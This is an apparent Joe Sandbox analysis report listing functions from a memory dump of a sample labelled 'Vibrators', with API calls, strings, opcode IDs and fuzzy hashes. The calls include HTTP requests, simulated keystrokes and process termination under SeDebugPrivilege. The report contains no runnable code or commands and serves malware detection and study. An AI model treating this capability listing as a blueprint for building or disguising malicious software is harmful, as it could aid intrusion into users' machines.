_free.LIBCMT ref: 00A23055
_free.LIBCMT ref: 00A23060
_free.LIBCMT ref: 00A2306E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d2ef2676c9389d7d6caf3fe0764709903fd708e3b4d0b65f7e1339b174ffc351
Instruction ID: 6458a3664bd5ee29c08e3b2f597280d83f0d650653d96c415b821f5d4ad8d3ea
Opcode Fuzzy Hash: d2ef2676c9389d7d6caf3fe0764709903fd708e3b4d0b65f7e1339b174ffc351
Instruction Fuzzy Hash: AA11B676140118BFCB11EF98EA42EDD3BA5EF05350BC144A5FA089F222DA31EE519F90

Function 009F2AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009F2AF9
OleUninitialize.OLE32(?,00000000), ref: 009F2B98
UnregisterHotKey.USER32(?), ref: 009F2D7D
DestroyWindow.USER32(?), ref: 00A33A1B
FreeLibrary.KERNEL32(?), ref: 00A33A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A33AAD

Strings

close all, xrefs: 009F2AF4

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 65c3065f78cd5d64206683de7c47b95aa1c5175170f7057299250aa3211fd6e9
Instruction ID: 4ae11b64b31cfa8eb9009c4bb37ba85a66924196487626882f26919b8645be68
Opcode Fuzzy Hash: 65c3065f78cd5d64206683de7c47b95aa1c5175170f7057299250aa3211fd6e9
Instruction Fuzzy Hash: BBD17C32705216DFCB19EF14C985B69F7A4BF04750F1142ADEA4AAB2A1CB31AD52CF40

Function 00A68835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A689F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00A68A06
GetFileAttributesW.KERNEL32(?), ref: 00A68A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 00A68A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 00A68A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 00A68AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A68AF5

Strings

*.*, xrefs: 00A68AAB

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: e0825312eddf592ebbb7f54b27a276481fcf5105b132ab176879ee8b857ef6f7
Instruction ID: 0888a1bb5b345fd96fab15fefe8bb31c87c9ee80cb12a659c2d7547082f8d21e
Opcode Fuzzy Hash: e0825312eddf592ebbb7f54b27a276481fcf5105b132ab176879ee8b857ef6f7
Instruction Fuzzy Hash: 5C819EB29043059BCB24EF64C454ABAB3FCBF94350F584A1AF985D7250EF38D945CB92

Function 009F7447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 009F74D7

Part of subcall function 009F7567: GetClientRect.USER32(?,?), ref: 009F758D
Part of subcall function 009F7567: GetWindowRect.USER32(?,?), ref: 009F75CE
Part of subcall function 009F7567: ScreenToClient.USER32(?,?), ref: 009F75F6

GetDC.USER32 ref: 00A36083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A36096
SelectObject.GDI32(00000000,00000000), ref: 00A360A4
SelectObject.GDI32(00000000,00000000), ref: 00A360B9
ReleaseDC.USER32(?,00000000), ref: 00A360C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A36152

Strings

U, xrefs: 00A36021

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: f8cc5d71617b49c437ba2cc7bf0424cfeead9105b701d302e31b55731bd7d4bb
Instruction ID: d547b26ed7c6c584fdf9ec83ecfafee763aa7d3eff22509f289f0f59042325be
Opcode Fuzzy Hash: f8cc5d71617b49c437ba2cc7bf0424cfeead9105b701d302e31b55731bd7d4bb
Instruction Fuzzy Hash: 3D71AF31504209EFCF25DFA4C885ABA7BB6FF49320F14866AFE555B1A6C7318841DF50

Function 00A6CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A6CCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A6CCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A6CD0F
GetLastError.KERNEL32 ref: 00A6CD67
SetEvent.KERNEL32(?), ref: 00A6CD7B
InternetCloseHandle.WININET(00000000), ref: 00A6CD86

Strings

, xrefs: 00A6CD00

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 2c37e06f46970c9ceb41f8f37f190b748854c8015485a0773864191acd6e553e
Instruction ID: ce21254326fda26997aef66eb9a87e61ab3ee761893b26f418b69430bff8fce1
Opcode Fuzzy Hash: 2c37e06f46970c9ceb41f8f37f190b748854c8015485a0773864191acd6e553e
Instruction Fuzzy Hash: 0D317F71600204EFD721EFA58D88ABB7BFCEB45750B10452AF486D7240DB34DD059B60

Function 00A5A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A355AE,?,?,Bad directive syntax error,00A8DCD0,00000000,00000010,?,?), ref: 00A5A236
LoadStringW.USER32(00000000,?,00A355AE,?), ref: 00A5A23D

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00A5A301

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 00A5A26B
Line %d (File "%s"):, xrefs: 00A5A2A7
Line %d:, xrefs: 00A5A28C
., xrefs: 00A5A2E7
Error: , xrefs: 00A5A2CF

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: b30291a6a00563d7399431aa3002582e4fbd4338156b800b7a65e4ffae57351f
Instruction ID: b0aa08589fb34c0cee1cd089823f5378a6d71981020664e138e81c1cc5d997f3
Opcode Fuzzy Hash: b30291a6a00563d7399431aa3002582e4fbd4338156b800b7a65e4ffae57351f
Instruction Fuzzy Hash: 8A214D7294431EAFCF11AFA0CC0AEEE7B79BF18701F044869F615650A2EB719618DB11

Function 00A529EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00A529F8
GetClassNameW.USER32(00000000,?,00000100), ref: 00A52A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A52A9A

Strings

list, xrefs: 00A52A7C
SHELLDLL_DefView, xrefs: 00A52A19
largeicons, xrefs: 00A52A2E
smallicons, xrefs: 00A52A62
details, xrefs: 00A52A48

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 99e23b26fa2d2d195504e8b36fda9077166075f8712a4b6143e6b2afa5c1b256
Instruction ID: 678b91e61f39f9148d9dfafc332d9a7bffa3ce5922162d892ed3ebac267a14a9
Opcode Fuzzy Hash: 99e23b26fa2d2d195504e8b36fda9077166075f8712a4b6143e6b2afa5c1b256
Instruction Fuzzy Hash: 1F11C276688307B9FA246724EC07EE67BADBF167A5B200022FE04E50D2FB75A8554714

Function 009F7567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 009F758D
GetWindowRect.USER32(?,?), ref: 009F75CE
ScreenToClient.USER32(?,?), ref: 009F75F6
GetClientRect.USER32(?,?), ref: 009F773A
GetWindowRect.USER32(?,?), ref: 009F775B

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: dadceae1a2ee0aff068aa40522735247be32a5a00c62b80720352cc3c187c578
Instruction ID: 012de61725fd9a407fc57a2f3be9fa7387637dc4f3b85cedbda9d0be9e1de943
Opcode Fuzzy Hash: dadceae1a2ee0aff068aa40522735247be32a5a00c62b80720352cc3c187c578
Instruction Fuzzy Hash: 9EC1463991464AEBDB10CFE8C980BEEFBB1FF08310F14851AE995E7250D738A951DB61

Function 00A2D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00A2D237
_free.LIBCMT ref: 00A2D2A2
_free.LIBCMT ref: 00A2D2C8
_free.LIBCMT ref: 00A2D2F1
_free.LIBCMT ref: 00A2D329
_free.LIBCMT ref: 00A2D35A
_free.LIBCMT ref: 00A2D39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00A2D41C
_free.LIBCMT ref: 00A2D435

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: fd91b14fcececf78b822bf97017a64d2a8d97a7c679eeb3d0a845012fec9d587
Instruction ID: de3393cefdeeb5f107f205fd1b41669a19e774cc687ba52115980dc263a7bc4e
Opcode Fuzzy Hash: fd91b14fcececf78b822bf97017a64d2a8d97a7c679eeb3d0a845012fec9d587
Instruction Fuzzy Hash: 9561C671A04321AFDB25AFACFA41BE97BA4DF02320B15017DE945AB283E73199418B91

Function 00A85B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00A85C24
ShowWindow.USER32(?,00000000), ref: 00A85C65
ShowWindow.USER32(?,00000005,?,00000000), ref: 00A85C6B
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00A85C6F

Part of subcall function 00A879F2: DeleteObject.GDI32(00000000), ref: 00A87A1E

GetWindowLongW.USER32(?,000000F0), ref: 00A85CAB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A85CB8
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A85CEB
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00A85D25
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00A85D34

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 55656c8244c1ba8f09c599bb3faf5ed11a14b1aacd4c3e9f122a75b1ed8d50a1
Instruction ID: 4350eadc9d84759e025c02c793a4dfd30abde51bc70e0413b38a65b96cc7526f
Opcode Fuzzy Hash: 55656c8244c1ba8f09c599bb3faf5ed11a14b1aacd4c3e9f122a75b1ed8d50a1
Instruction Fuzzy Hash: 3C518A30E50A08BFEF24AFB8CC49F983BA1FB04760F148112FE259A1E1D775A990DB41

Function 009F13A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00A328D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00A328EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A328FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00A32912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A32933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009F11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00A32942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A3295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009F11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00A3296E

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 06e0b3ead7506844eac849c7126f48fdd42854af86465fc8d6f52c2b0c86f03e
Instruction ID: e24b28cbbd903bd960326da0facab7f578e5da0d11187c106b1494a123770c12
Opcode Fuzzy Hash: 06e0b3ead7506844eac849c7126f48fdd42854af86465fc8d6f52c2b0c86f03e
Instruction Fuzzy Hash: 4D514730600209EFDB24DF65CC45FAA7BB5FB88720F104529FA46962E0DBB0E991DB90

Function 00A6CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A6CBC7
GetLastError.KERNEL32 ref: 00A6CBDA
SetEvent.KERNEL32(?), ref: 00A6CBEE

Part of subcall function 00A6CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A6CCB7
Part of subcall function 00A6CC98: GetLastError.KERNEL32 ref: 00A6CD67
Part of subcall function 00A6CC98: SetEvent.KERNEL32(?), ref: 00A6CD7B
Part of subcall function 00A6CC98: InternetCloseHandle.WININET(00000000), ref: 00A6CD86

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: fad1c818c82c45cb776eb80963345a99bb981c2a39b29b811218f1be312d2ccb
Instruction ID: e5f655670bf805b6412535044badee2fddeecb1206e9eba513eb88eded19b189
Opcode Fuzzy Hash: fad1c818c82c45cb776eb80963345a99bb981c2a39b29b811218f1be312d2ccb
Instruction Fuzzy Hash: B731AC71601701AFDB219FB1CD44A7BBBF8FF04320B00452DF89A86610D730E915EBA0

Function 00A52EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A54393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A543AD
Part of subcall function 00A54393: GetCurrentThreadId.KERNEL32 ref: 00A543B4
Part of subcall function 00A54393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A52F00), ref: 00A543BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 00A52F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00A52F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00A52F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 00A52F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00A52F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00A52F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 00A52F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00A52F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00A52F74

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 5ae229e9bdad16cede85585ae18e5e7b3e5d844458a24711fdb8c0a711b710dd
Instruction ID: 6c36e82665ea70c64eac55068cb488378c1d0fc040f04044a541205393f5219b
Opcode Fuzzy Hash: 5ae229e9bdad16cede85585ae18e5e7b3e5d844458a24711fdb8c0a711b710dd
Instruction Fuzzy Hash: A501D8707942147BFB106BA89C8EF593F59EF4DB12F100015F718AE1E4C9F164498BA9

Function 00A52150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00A51D95,?,?,00000000), ref: 00A52159
HeapAlloc.KERNEL32(00000000,?,00A51D95,?,?,00000000), ref: 00A52160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A51D95,?,?,00000000), ref: 00A52175
GetCurrentProcess.KERNEL32(?,00000000,?,00A51D95,?,?,00000000), ref: 00A5217D
DuplicateHandle.KERNEL32(00000000,?,00A51D95,?,?,00000000), ref: 00A52180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A51D95,?,?,00000000), ref: 00A52190
GetCurrentProcess.KERNEL32(00A51D95,00000000,?,00A51D95,?,?,00000000), ref: 00A52198
DuplicateHandle.KERNEL32(00000000,?,00A51D95,?,?,00000000), ref: 00A5219B
CreateThread.KERNEL32(00000000,00000000,00A521C1,00000000,00000000,00000000), ref: 00A521B5

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 47fff0b6ba9ff72c4d693e5ee017a8ef7465562198fc75a8bc86609a8e3d3c69
Instruction ID: 28bb51087732cbea4c2c7ed2353637db3560db6b8697a02461d9e22837817d64
Opcode Fuzzy Hash: 47fff0b6ba9ff72c4d693e5ee017a8ef7465562198fc75a8bc86609a8e3d3c69
Instruction Fuzzy Hash: D101A8B5240304BFE610EBA5EC8DF6B7BACEB89711F004511FA05DB1E1CA709805CB20

Function 00A7AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00A5DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00A5DDAC
Part of subcall function 00A5DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00A5DDBA
Part of subcall function 00A5DD87: CloseHandle.KERNEL32(00000000), ref: 00A5DE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A7ABCA
GetLastError.KERNEL32 ref: 00A7ABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A7AC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 00A7ACC5
GetLastError.KERNEL32(00000000), ref: 00A7ACD0
CloseHandle.KERNEL32(00000000), ref: 00A7AD21

Strings

SeDebugPrivilege, xrefs: 00A7ABEC

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: d35095d43db73482b466b24cb526f7dd626e5b700a6ca6d50d6b35c64a8df643
Instruction ID: 2fe9047c4e7751201eebe89db8bdd1a7e351ef78c447e1ed77310756ba7afb8b
Opcode Fuzzy Hash: d35095d43db73482b466b24cb526f7dd626e5b700a6ca6d50d6b35c64a8df643
